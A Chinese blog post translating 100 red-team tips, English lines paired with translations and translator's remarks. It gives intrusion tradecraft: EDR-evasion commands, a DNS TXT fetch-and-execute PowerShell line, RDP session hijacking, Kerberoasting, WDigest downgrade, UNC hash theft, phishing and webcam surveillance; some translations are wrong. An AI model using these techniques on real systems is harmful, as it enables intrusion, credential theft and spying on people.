红队渗透测试提示(1-100条)

红队渗透测试提示来源于斯圆安全@vysecurity大佬 @Vincent Yiu的站点Red Team Tips 我这篇就当翻译稿。从红蓝角度思考与对抗,补充下自己的不足。

# Red Team Tips

# 1- 10

Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.
红队提示 #1 分析受害者(蓝方目标)并使用他们的UA来隐藏自己的流量。或者可以使用软件的ua例如Outlook

Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.
红队提示 #2 如果蓝方SOC分析代理日志。你猜怎么着？它不会记录cookies或post body等敏感内容。

Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.
红队提示 #3：做个AD快照可以让你浏览、探索和制定未来的攻击如果访问暂时丢失。

Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.
红队提示 #4：在VDI虚拟机环境中考虑使用Office模板macros以及替换normal.dot的方式来持续控制

• 不解： 在非虚拟化环境这个宏的方式就不考虑么？

Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.
红队提示 #5：对DNS lookup时，可以尝试Intranet，SharePoint，Wiki，nessus，cyberark等字段，获取目标情报。

Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell
红队提示 #6：有了权限但需要找到目标？通过wmic去查询和dump dns区域，以获得更好的资产视图

Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.
红队提示 #7：无论是psexec、wmi、ps remote 执行，还是最近的用于横向移动的com执行技术。别忘了RDP远程桌面。

Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!
红队提示 #8：确保邮件，投递服务器和有效载荷执行中有跟踪器。还有跟更多a的？评论分享！

• 不解：trackers是指什么？

Red tip #9: When PowerUp yields no results, dont forget SysInternalss AutoRuns. Often you can find unexpected surprises 😃
红队提示 #9：当PowerUp没有结果时，请不要忘记SysInternalss AutoRuns。通常您会发现意想不到的惊喜。

Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.
红队提示 #10：在使用BloodHound时，不要忘记域账户DA的等价物，如管理员和服务器操作员等。这些没有映射。

# 11-20

Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.
红队提示 #11：当处在经典网络环境时，同时拿到旧网络图和AD中组织单元OU，有助于我们下一步的工作。

Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat
红队提示 #12：Kerberoast获取hash，可能是通往域管理员的快速途径。 PowerView：调用Kerberoast -Format Hashcat

Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away
红队提示 #13：共享的本地管理员帐户哈希值非常适合横向移动。 查找基于相同构建的机器并进行攻击

Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.
红队提示 #14：有其他凭证吗？对不同的出口通道使用不同的设置，以便如果一个帐户被禁用，其余的都可以。

Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.
红队提示 #15：当可以通过钓鱼方式得到凭据并登录到Citrix、VPN、没有双因素认证的电子邮件时，不需要payload。检查边界。

Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organisation. 红队提示 #16：MailSniper,LyncSniper两款工具，能在他们的方式能获取进入蓝方组织AD凭证，但是噪音大。

Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally
红队提示 #17：如果可以从外部访问Exchange，尝试使用Ruler这款工具，可以在运行Outlook的系统上获取代码执行

Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks
红队提示 #18：当像mailsniper这样的工具不能在环境中工作时，仍然可以使用老伙计burpsuite来复制mailsniper的攻击过程

Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)
红队提示 #19: 常见域渗透命令行.

Red tip #20: So apparently not many people use SSH for redirector setup. So try out ssh c2 -R *:80:localhost:80. SSH config GatewayPorts yes
红队提示 #20:ssh重定向 ssh c2 -R *:80:localhost:80

# 21-30

Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.
红队提示 #21:找到可访问的开放用户家庭共享？看看是否可以进入“启动程序”进行横向移动和特权。

Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.
红队提示 #22:使用VNC，麦克风和网络摄像头监控。 Netstat，tasklist可以提供有关用户正在执行的操作的上下文。

Red tip #23: Stash payloads in C:\$Recycle.Bin
红队提示 #23: 可以将payload隐藏为C:$Recycle.Bin

Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats
红队提示 #24:破坏SOC和安全团队，进而观察他们的流程以及跟踪蓝方用于复杂威胁的电子邮件警报。

Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.
红队提示 #25:没看懂，我后续微信统一问下他。

Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defence.
红队提示 #26:将行动分解，使其独立。立即发送大量诱饵，摧毁防御。

Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.
红队提示 #27: 在Sharepoint以及intranet，github等，搜索密码

Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!
红队提示 #28: 寻找资产登记本以了解谁拥有什么机器，制造商和型号。 通常也有一个资产标签来作为主机名！

Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?
红队提示 #29: 横向运动：打印机，开放的网络根目录，老版本Tomcat。

Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi 😃
红队提示 #30: 获取AD凭据？ 打开网站，你也许可以使用它们登录到公司的Wifi 😃

# 31-40

Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.
红队提示 #31: 寻找电子邮件和网络共享以获取渗透测试报告通常可以产生良好的结果。

Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.
红队提示 #32: 列出挂载：网络使用，查找共享文件夹，然后将UNC图标LNK放到其中。在主机上运行Inveigh或Wireshark来获取哈希。

Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.
红队提示 #33: 组织/公司正在过渡到云服务，如AWS、Beanstalk、O365、Google应用程序。2fa/双因素认证对于密码重置要的折中方案是至关重要。

Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.
红队提示 #34: OpSec（作战安全）。设置手机通知，当攻击基础设施被试图登录或入侵的时候。

Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan
红队提示 #35: FireEye沙箱标记你的有效载荷?尝试反沙盒技术!如果没有，就使用HTA进入内存，因为它不会扫描。

Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough
红队提示 #36 不要忘记sysvol中的旧gpp密码。计算机上可能有缓存的GPP。补丁程序是不够的

• 域渗透

Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA
红队提示 #37 利用GEHTA工具可以生成反沙箱的HTA文件。https://github.com/vysec/genhta

Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA
红队提示 #38 很难将CS的evil.hta通过防御系统？MorphHTA的油管视频：

Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.
红队提示 #39: 如果邮件被退回，请阅读邮件!有时是由于恶意软件扫描，垃圾邮件等。或者你甚至会得到一个外出的答复。

Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.
红队提示 #40: 0x09AL建议在打印机和嵌入式设备上查找默认凭据。以此移开最初的立足点。

# 41-50

Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1
红队提示 #41: Oddvarmoe建议如果需要将文件放在磁盘上，请使用备用数据流。例如https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1

• 不解

Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!
红队提示 #42: 可以访问操作系统级别的中间层？tasklist，netstat和 wmic process list full | findstr /I commandline 获取更多思路！

Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings
红队提示 #43: 如果知道服务器应用程序文件在哪里。下载二进制文件并检查conn的配置文件字符串。

Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.
红队提示 #44: 利用PEiD或其他类逆向程序/技术检查器，以查找下载的服务器二进制文件使用的是什么编程语言和打包/加壳程序。

Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)
红队提示 #45: 在应用程序二进制文件上分析字符串，以获取其他可能的明文敏感字符串！ （Unicode是一种）

Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.
红队提示 #46: 在虚拟桌面架构（VDI）中？检查C盘和其他磁盘上是否有其他用户可能已保存在其中的潜在敏感文件。

Red tip #47: Incase EDR are looking for net users /domain try using net use /dom
红队提示 #47: 防止EDR通过寻找net users /domain 检测，请尝试使用net use /dom

Red tip #48: Is EDR potentially looking for powershell -encodedcommand? Try powershell -ec
红队提示 #48:EDR是否在寻找powershell -encodedcommand？尝试使用powershell -ec

Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system
红队提示 #49:攻击Macintosh或Linux资产？发送带有操作系统检查逻辑的Office Maldoc以获取任一系统的权限。

Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]
红队提示 #50: Carbon Black检查IEX和Web req命令。使用powershell命令行powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]

# 51-60

Red tip #51: Cant open C drive? Try \\127.0.0.1\c$
红队提示 #51: 不能打开C盘？尝试\\127.0.0.1\c$

Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \\targetip\ipc$ password /u:domain\username then sc to psexec
红队提示 #52: SC没有登录凭证。不能使用runas？ 试试net use \\targetip\ipc$ password /u:domain\username然后再执行 sc 转为 psexec.

Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/
红队提示 #53: 当钓鱼2FA(双因素)时，考虑使用@mrgretzky evilginx project来获取cookies。https://breakdev.org/evilginx-1-1-发布/

Red tip #54: Hide from blue. Volume shadow copy then execute \\ \GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC
红队提示 #54: 躲开蓝队。Volume shadow copy然后执行 \\ \GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll然后删除VSC(Volume shadow copy)

Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.
红队提示 #55: 使用图像链接的UNC路径注入进行smb hash泄漏，可以在不太成熟的环境获取凭据。

Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!
红队提示 #56：瞄准使用电子邮件身份验证（如Windows 10上的Microsoft帐户）的受害者？Hash泄漏暴露完整的电子邮件地址！

Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping
红队提示 #57： 团队合作会产生更好的效果；最重要的是，让进攻性的行动更有趣，并保持斗志昂扬。

Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"
红队提示 #58： 与客户讨论业务目标。这个过程应该设定非技术性的目标，比如“ATM吐钱”

Red tip #59: Checking whether a server or host is good for egress? Likely to go down? systeminfo | findstr /i boot
红队提示 #59：检查服务器或主机是否适合外连？可能会关机？systeminfo | findstr /i boot

Red tip #60: Type query user to see who else is connected to the machine.
红队提示 #60: 键入query user以查看还有谁连接到了计算机。

# 61-70

Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.
红队提示 #61: 使用wmic qfe list brief获得快速补丁列表。通过关联KB号查看补丁公告。

Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
红队提示 #62: 找到了感兴趣的进程？不要忘记获得MiniDump！使用Out-MiniDump

Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up
红队提示 #63: 最后，在Cyber​​Ark中，单击"policies"并查看"safes"，但没有帐户？转到帐户“搜索”，然后搜索空的"safes"

Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP
红队提示 #64: 网关允许WebDav吗？使用http mini重定向程序？不要泄露或发送文件。 WebDav须遵守DLP

• 不解

Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share then start z:
红队提示 #65: WebDav mini http重定向器：net use * http://totallylegit.com/share，然后start z：

• 不解

Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt
红队提示 #66: 找到了潜在的MQ凭证？ ActiveMQ？试用https://github.com/fmtn/a，用于查询不使用自签名crt认证的MQ端点

Red tip #67: Use vssadmin to list and create volume shadow copies
红队提示 #67: 利用vssadmin去列出以及创建‘卷影副本’

Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom
红队提示 #68: 进入没有DNS或Web网关且需要配置的安全区域？ Netsh端口将UDP 53转发到DNS 53，然后重新启动

Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt
红队提示 #69: 蓝队已经隐藏了包括【win】 +【R】在内的方法吗？尝试移动并右键单击桌面来打开命令提示符.

Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times
红队提示 #70: 追查putty会话？弹出盒子？查询用户并查看受害者的登录时间和空闲时间

# 71-80

Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>" then use putty session.
红队提示 #71: 使用sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>"劫持会话，然后利用putty会话.

Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.
红队提示 #72:大多数人理解邮箱安全引起的问题。SPF不是意味着不能被欺骗。在没有DMARC，SPF啥都做不了。

Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo. 红队提示 #73: 受害者域的DMARC弱？ 伪装成他们自己！ 您甚至可以获得他们的AD名称和照片。

Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object
红队提示 #74: 访问微软OWA或office365？你可以利用@Burp_Suite 提取联系人分类 并转成json格式。

Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed. 红队提示 #75: 编写trackerPHP delivery scripts混淆载荷并在每次下载时添加不同的跟踪器 .这样的话，调试文件代码需要执行。

Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats 红队提示 #76: 用删除和获取议程来模拟犯罪威胁故事？ 以网络钓鱼用户和热插拔有效载荷活动来安排测试

Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcpif its domain joined Invoke-Kerberoast 红队提示 #77: 在不完善的web应用客户端上RCE？如果其域加入了Invoke-Kerberoast nslookup -q = srv _ldap._tcp

Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks
红色提示＃78：@ benichmt1建议在整个网络中查找vmdk文件。 您可以使用它来访问隔离的网络

Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon
红色提示＃79：混淆永远是不错的选择，尤其在单击按钮时。 @danielhbohannon-https://github.com/danielbohannon

Red tip #80: Need to sweep for uptimes? Use wmic /node:"<computer>" OS get LastBootUpTime in a for loop
红色提示＃80:需要扫描正常运行时间吗？使用 wmic /node:"<computer>"os在for循环中获取lastbootuptime。

# 81-90

Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief 😃 then look at RT #82
红色提示＃81: 寻找运行KeePass的系统？运行for循环执行：wmic /node:"host" process list brief:）然后查看RT #82

Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief
红色提示＃82: 发现keepass在运行？使用@harmj0y的keetifer提取密码并下载kdbx-https://github.com/harmj0y/keetifer

Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session. 红色提示＃83: 找不到工作的数据库客户端？离开这，使用你的受害者的RDP会话。

Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe
红色提示＃84: 我确信每个人都讨厌OracleDB，但是不要担心，您可以proxycap 重定向sqldeveloper.exe

Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.
红色提示＃85: 在持久控制用户的计算机之前，请检查用户日历。他们可能不在办公室，搞砸了你的计划。

Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating. 红色提示＃86: 红队和攻击模拟不是渗透测试。你不应该真的测试任何东西，只是简单的渗透。

Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/ 红色提示＃87:@Oddvarmoe使用.udl文件快速启动MSSQL连接测试以验证凭据！

Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.
Red tip #88: 别忘了物理安全！用gsm创建一个pi，你可以通过把树莓PI放到红方网络上来破解。

Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for script case sensitive and <registration case insensitive.
Red tip #89: regsvr32 sct文件被检测为squigglydoo。查找script区分大小写且<registration 区分大小写。

Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only <havexhavex> but not <havexDATABLOBhavex> Red tip #90: 思科NGIPS是狗屎，当分析havex的流量时，它只会下降<havexhavex>而不是<havexDATABLOBhavex>

# 91-100

Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees
红队提示 #91: 诱饵可以很简单，例如扫描1-1024端口并通过IDS制造混乱或在员工群中散发钓鱼邮件

Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1
红队提示 #92: 如果禁用了WDigest，则在新用户使用@harmj0y登录之前,重新启用WDigest来获取明文凭证。

Explicitly sets Wdigest on a Windows 8.1/Server 2012 machine to use logon credentials.
Locks the screen after so the user must retype their password.

Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre
红队提示 #93: 利用Empyre可以生成Macintosh以及Linux环境的载荷，修改后可以用于windows环境。

Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username
红队提示 #94: 用户使用了VDIs（虚拟桌面架构）？攻陷宿主(物理)主机并使用Citrix Shadow Taskbar监视不同用户的VDI会话。

Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.
红队提示 #95: @domchell建议避免使用非持久性VDI，并在笔记本电脑上持久化。查询DC实时笔记本电脑。

Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too
红队提示 #96: @lucasgates建议使用包含VBS脚本的OLE对象而不是包含宏的OLE对象，因为它不太可疑。VBE也将工作。

Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
红队提示 #97: 使用最近的严重漏洞（例如CVE-2017-0199 HTA处理程序问题）模拟真实威胁。

Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal
红队提示 #98: @0x09AL建议使用WordSteal。您可以将图像与UNC路径一起嵌入，以从Word窃取哈希。如果代理不能工作。

Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery
红队提示 #99: 如果客户端利用webdav代理，可以使用@ryHanson Phishery钓鱼获取凭证

Red tip #100: Use wgsidav if you need a quick WebDav server 😃 https://github.com/mar10/wsgidav
红队提示 #100: 如果想要快速获取WebDav服务器，那么可以使用wgsidav